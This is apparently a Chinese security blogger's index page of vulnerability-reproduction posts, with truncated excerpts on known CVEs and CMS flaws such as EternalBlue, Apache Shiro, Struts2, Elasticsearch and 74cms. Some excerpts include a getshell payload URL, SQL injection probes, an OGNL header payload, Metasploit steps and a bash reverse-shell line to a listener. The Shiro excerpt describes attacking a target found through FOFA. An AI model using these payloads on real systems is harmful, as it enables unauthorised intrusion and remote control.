漏洞复现
浅笑⁹⁹⁶
这个作者很懒,什么都没留下…
展开
-
CVE-2019-0708 RCE复现
漏洞环境192.168.91.136 windows7 6.1.7601 192.168.91.151 kaliWindows7 SP1下载链接:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/复现过程1、首先升级MSFapt-get updateapt-get install metaspl...原创 2020-06-29 14:49:17 · 647 阅读 · 0 评论 -
74cms v4.2.1-v4.2.129-后台getshell漏洞复现
0x00 影响范围v4.2.1-v4.2.1290x01 环境搭建1. 先去官网下载 骑士人才系统基础版(安装包)2.将下载好的包进行安装0x02 复现过程当前版本v4.2.111点加工具,点击风格模板Payload:http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'shell地址:http://127.0....原创 2020-06-28 17:48:44 · 1301 阅读 · 0 评论 -
ms17-010-永恒之蓝漏洞利用教程
永恒之蓝漏洞利用实验教程1.打开虚拟机 启动kali-linux 启动windows7(未装补丁) 2.获取IP地址(ifconfig ipconfig) kali-linux :192.168.0.129 windows7 : 192.168.0.130 3. kali-linux输入msfconsole启动msf(若不是root登陆需sudo提升权限...原创 2018-08-18 11:14:02 · 7671 阅读 · 3 评论 -
Discuz!X系列全版本后台sql注入复现
圈子某位大佬公布的0day,拿来刷一刷,漏洞分析请移步大佬文章。大佬链接0x01 环境准备1、首先去码云下载最新版本的discuz(DiscuzX 3.4 R20191201)。2、将upaod放置到网站目录下,访问安装目录安装即可。0x02 漏洞复现点击站长--UCenter设置点击最下面的提交进行抓包判断列数1' order by 1 //返回正确1' order by 2 //返回错误查询当前用户1' and updatexml(.原创 2020-06-28 17:23:04 · 3234 阅读 · 1 评论 -
Apache Shiro反序列化远程代码执行复现
1、寻找目标首先FOFA找一个环境,检测工具检测一下发现目标,开干!2、开启监听首先在vps运行nc 监听一个端口nc -lvp 666列出需要使用的反弹指令bash -i >& /dev/tcp/129.204.xxx.xxx/666 0>&1将指令放到http://www.jackson-t.ca/runtime-exec-payloads.html转换成加密后的指令将指令合成为一个java的监听指令...原创 2020-06-28 17:06:09 · 1755 阅读 · 0 评论 -
CVE-2017-12635(Couchdb垂直权限绕过漏洞)
简介Apache CouchDB是一个开源数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年年11月15日...原创 2018-11-28 21:56:00 · 1777 阅读 · 4 评论 -
CVE-2010-2861(Adobe ColdFusion 文件读取漏洞)
漏洞介绍Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。环境搭建https://blog.csdn.net/qq_36374896/article...原创 2018-11-27 09:42:54 · 2618 阅读 · 3 评论 -
CVE-2015-5531(目录遍历漏洞)
vulhub漏洞环境搭建https://blog.csdn.net/qq_36374896/article/details/84102101启动docker环境cd vulhub-master/elasticsearch/CVE-2015-5531/sudo docker-compose up1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch...原创 2018-11-26 15:27:50 · 1329 阅读 · 0 评论 -
CVE-2015-3337(任意文件读取)
vulhub漏洞环境搭建:https://blog.csdn.net/qq_36374896/article/details/84102101启动docker环境cd vulhub-master/elasticsearch/CVE-2015-3337/sudo docker-compose up目录穿越漏洞:ElasticSearch安装site插件后,通过…/可以向上层目录跳转,导...原创 2018-11-24 21:26:56 · 2276 阅读 · 0 评论 -
CVE-2015-1427(Groovy 沙盒绕过 && 代码执行漏洞)
1、vulhub环境搭建https://blog.csdn.net/qq_36374896/article/details/841021012、启动docker环境cd vulhub-master/elasticsearch/CVE-2015-1427/sudo docker-compose up3、访问目标的9200,会出现Elasticsearch的信息:新版本中Elastic...原创 2018-11-22 21:46:58 · 1957 阅读 · 0 评论 -
CVE-2014-3120 (命令执行漏洞)
环境配置启动docker环境cd vulhub-master/elasticsearch/CVE-2014-3120/sudo docker-compose up9200 端口已开启访问目标的9200,会出现Elasticsearch的信息:利用该漏洞要求Elasticsearch中有数据,所以先创建一条数据,采用Burp发送数据包:POST /website/blog/ H...原创 2018-11-21 20:15:31 · 2507 阅读 · 0 评论 -
S2-048(RCE远程代码执行)
环境搭建:https://blog.csdn.net/qq_36374896/article/details/84145020进入漏洞环境cd vulhub-master/struts2/s2-048/启动s2-048环境:sudo docker-compose up访问目标主机地址:http://192.168.91.130:8080/showcase/访问Integrat...原创 2018-11-23 19:31:08 · 1662 阅读 · 0 评论 -
S2-045(RCE远程代码执行)
环境搭建:https://blog.csdn.net/qq_36374896/article/details/84145020漏洞复现PayloadContent-Type:~multipart/form-data %{#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime()...原创 2018-11-25 19:41:32 · 684 阅读 · 0 评论 -
CVE-2017-11882(Office远程代码执行)
测试环境:win7+kali+office 2007 xp+kali+office 2003win7 ip:10.10.1.144 xp ip: 10.10.1.126 kali ip 10.10.1.67一. 简单测试弹出计算器(xp)1.在kali下执行生成一个含有恶意代码的doc进行测试:PythonCommand109b_CVE-2017-11882 -c “cmd.exe /...原创 2018-11-22 21:47:27 · 524 阅读 · 0 评论 -
CVE-2017-7269(IIS远程代码执行)
利用CVE-2017-7269让IIS向自己的msf反弹一个shell确认目标是IIS并且开启webdav打开msf,使用expmsfconsole use exploit/windows/iis/cve-2017-7269 set rhost 192.168.91.129show optionsrun获得一个meterpreter...原创 2018-11-20 17:56:00 · 1386 阅读 · 1 评论 -
CVE-2012-1823(PHP-CGI远程代码执行)
基于vulhub漏洞环境:安装vulhub漏洞环境https://mp.csdn.net/mdeditor/84102101#CGI模式下的参数:-c 指定php.ini文件的位置-n 不要加载php.ini文件-d 指定配置项-b 启动fastcgi进程-s 显示文件源码-T 执行指定次该文件-h和-? 显示帮助1.启动漏洞环境进入 CVE-20...原创 2018-11-20 17:56:25 · 4892 阅读 · 0 评论 -
YCCMS 3.3 CSRF漏洞--代码执行
一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\YCCMS),点击确定漏洞分析1.点击展开左侧admin目录,在弹出的下拉列表中双击index.php页面,右侧页面可以看到相关代码。<?phprequir...原创 2019-02-14 17:29:23 · 2793 阅读 · 0 评论 -
74CMS 3.0 SQL注入漏洞后台
代码审计工具:seay CMS:74CMS3.0一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定漏洞分析4...原创 2019-03-26 18:07:36 · 2714 阅读 · 1 评论 -
dedecms 5.7 任意前台用户修改漏洞
一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\ dedecms v57),点击确定漏洞分析1.进入member/resetpassword.php页面,将鼠标滚动到页面第75行else if($dopost =...原创 2018-12-10 13:59:26 · 1382 阅读 · 0 评论 -
fastcgi未授权访问及任意命令执行
1. 漏洞原理服务端使用fastcgi协议并对外网开放9000端口,攻击者可以构造fastcgi协议包内容,实现未授权访问服务端.php文件以及执行任意命令。2. 漏洞利用第一步 搭建vulhub靶机环境请看链接:https://blog.csdn.net/qq_36374896/article/details/84102101第二步 Payload构造攻击机构造Payload 示例:...原创 2018-11-21 09:43:16 · 2302 阅读 · 1 评论 -
74CMS 3.0 存储型XSS漏洞
一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定漏洞分析1.点击展开左侧link目录,弹出的下拉列表中双击a...原创 2019-01-09 15:42:53 · 938 阅读 · 0 评论 -
74CMS 3.0任意文件写入漏洞
一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定漏洞分析1.点击展开左侧admin目录,在弹出的下拉列表中双...原创 2018-12-18 21:26:00 · 2147 阅读 · 0 评论 -
Flask(Jinja2) 服务端模板注入漏洞
原理参考文章:https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdfhttp://rickgray.me/use-python-features-to-execute-arbitrary-codes-i...原创 2018-12-11 19:08:48 · 1354 阅读 · 0 评论 -
Rsync反弹shell
vulhub环境靶机 : 192.168.91.130攻击机:kali 192.168.91.128一、环境搭建vulhub环境靶机环境搭建 在纯净ubuntu中部署vulhub环境:1、安装docker,并用docker -v命令验证安装结果; curl -s https://get.docker.com/ | sh2、安装python-pip,并用pip -V命令验...原创 2018-11-18 13:12:34 · 907 阅读 · 0 评论 -
IIS短文件猜解
1.IIS短文件漏洞Microsoft IIS 短文件/文件夹名称信息泄漏最开始由Vulnerability Research Team(漏洞研究团队)的Soroush Dalili在2010年8月1日发现,并于2010年8月3日通知供应商(微软公司)。微软公司分别于2010年12月1日和2011年1月4日给予答复下个版本修复。2012年6月29日,此漏洞公开披露(中危)。此漏洞实际是由HTT...原创 2018-11-18 13:11:42 · 3065 阅读 · 1 评论 -
Rsync未授权访问
1.漏洞名称Rsync 未授权访问漏洞2.漏洞原理rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或 访问密码,我们将可以读写目标服务器文件。3.漏洞利用vulhub环境靶机 : 192.168.91.130攻击机:kali 192.168.91.128...原创 2018-11-19 14:36:45 · 5236 阅读 · 0 评论 -
MSSQL得知密码后getshell
本文用了 sql server 2000和sql server 2008MSSQL连接连接MSSQL 2000新建连接:填写目的IP、目的端口、用户名、密码:一直下一步,完成后,数据库导航窗口会出现一个连接,双击连接:若是第一次连接,双击会提示下载驱动文件,若不成功,需多次反复尝试新建SQL编辑器即可执行SQL语句:查询SQL Server版本SQL语句如下:selec...原创 2018-11-19 18:00:09 · 523 阅读 · 0 评论 -
Struts2搭建及利用OGNL表达式弹出计算器
0x01 环境搭建创建Struts2应用创建一个动态网站项目配置Tomcat启动环境3. 在WebContent目录下的WEB-INF文件夹中创建web.xml,Tomcat启动时会加载此文件,内容如下:<?xml version="1.0" encoding="UTF-8"?><web-app原创 2018-11-16 20:11:39 · 426 阅读 · 0 评论 -
Apache HTTPD 未知后缀解析漏洞
环境搭建https://blog.csdn.net/qq_36374896/article/details/84102101该环境版本:PHP 7.x 最新版Apache HTTPD 2.4.10 稳定版(来自debian源)由此可知,该漏洞与Apache、php版本无关,属于用户配置不当造成的解析漏洞。开启环境:cd vulhub-master/httpd/apache_parsi...原创 2018-11-24 21:27:11 · 1525 阅读 · 0 评论 -
Discuz 7.x、6.x 全局变量防御绕过导致代码执行
0x01 分析由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含REQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。具体原理请参考:https://www.secpulse.com/archives/2338.html0x02 环境...原创 2018-11-25 19:41:00 · 1178 阅读 · 0 评论 -
phpcms手工注入教程
目标服务器(靶机):192.168.1.27 目标网站:http://192.168.1.27:8083攻击机器:利用镜像win2k8创建云主机,并作为攻击机步骤:一、靶机操作1、进入靶机,查看IP地址;开始—运行,输入cmd回车,出现命令行窗口,输入:ipconfig显示,靶机配置信息,记下以太网适配器下,IPv4地址(后面访问网页会用到)。此处为192.168.1.272、启动...原创 2018-10-24 11:25:55 · 601 阅读 · 1 评论 -
Nginx配置不当(CRLF注入 、目录穿越)
基于vulhub漏洞环境环境搭建参考:https://blog.csdn.net/qq_36374896/article/details/841021011.漏洞名称CRLF注入2.漏洞原理Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞。错误的配置文件示例(原本的目的是为了让http的请求跳转到https上):location / { ...原创 2018-11-23 19:30:34 · 3034 阅读 · 1 评论 -
Aria2任意文件写入漏洞
Aria2Aria2是一个轻量级,多协议,多源下载工具(支持HTTP / HTTPS,FTP,BitTorrent,Metalink),内置XML-RPC和JSON-RPC接口。环境搭建启动漏洞环境:cd vulhub-master/aria2/rce/sudo docker-compose up6800是aria2的RPC服务的默认端口,环境启动后,访问 http://your...原创 2018-11-26 15:28:10 · 1801 阅读 · 0 评论 -
74CMS 3.0 任意文件删除漏洞
一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定漏洞分析1.点击展开左侧admin目录,在弹出的下拉列表中双...原创 2018-12-08 14:57:04 · 613 阅读 · 0 评论 -
74CMS 3.0 SQL注入漏洞前台
一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定漏洞分析1.点击展开左侧user目录,弹出的下拉列表中双击u...原创 2018-12-09 22:52:57 · 1686 阅读 · 0 评论 -
metinfo 6.0 任意文件读取漏洞
一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\metinfo),点击确定漏洞分析1.点击展开左侧app\system\include\module\目录,在弹出的下拉列表中双击old_thumb.class.ph...原创 2018-12-20 22:02:56 · 1997 阅读 · 1 评论 -
74CMS 3.4 反射型XSS漏洞
一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.因为74CMS3.4源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定漏洞分析1.点击展开左侧templates\default目...原创 2018-12-26 17:46:53 · 1630 阅读 · 0 评论 -
phpcms 2008 变量覆盖漏洞
一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\ phpcms 2008),点击确定漏洞分析1.点击展开/yp/web/include/common.inc.php<?phpdefined('IN_PHP...原创 2018-12-26 17:47:15 · 489 阅读 · 0 评论 -
phpmyadmin 4.8.1 文件包含漏
一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\phpmyadmin),点击确定漏洞分析1.双击index.php页面,将鼠标滚动到页面第53行// If we have a valid target, let'...原创 2018-12-27 19:31:11 · 1213 阅读 · 0 评论 -
74CMS 3.0 CSRF漏洞
一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定漏洞分析1.点击展开左侧admin目录,在弹出的下拉列表中双...原创 2018-12-27 19:31:25 · 1114 阅读 · 0 评论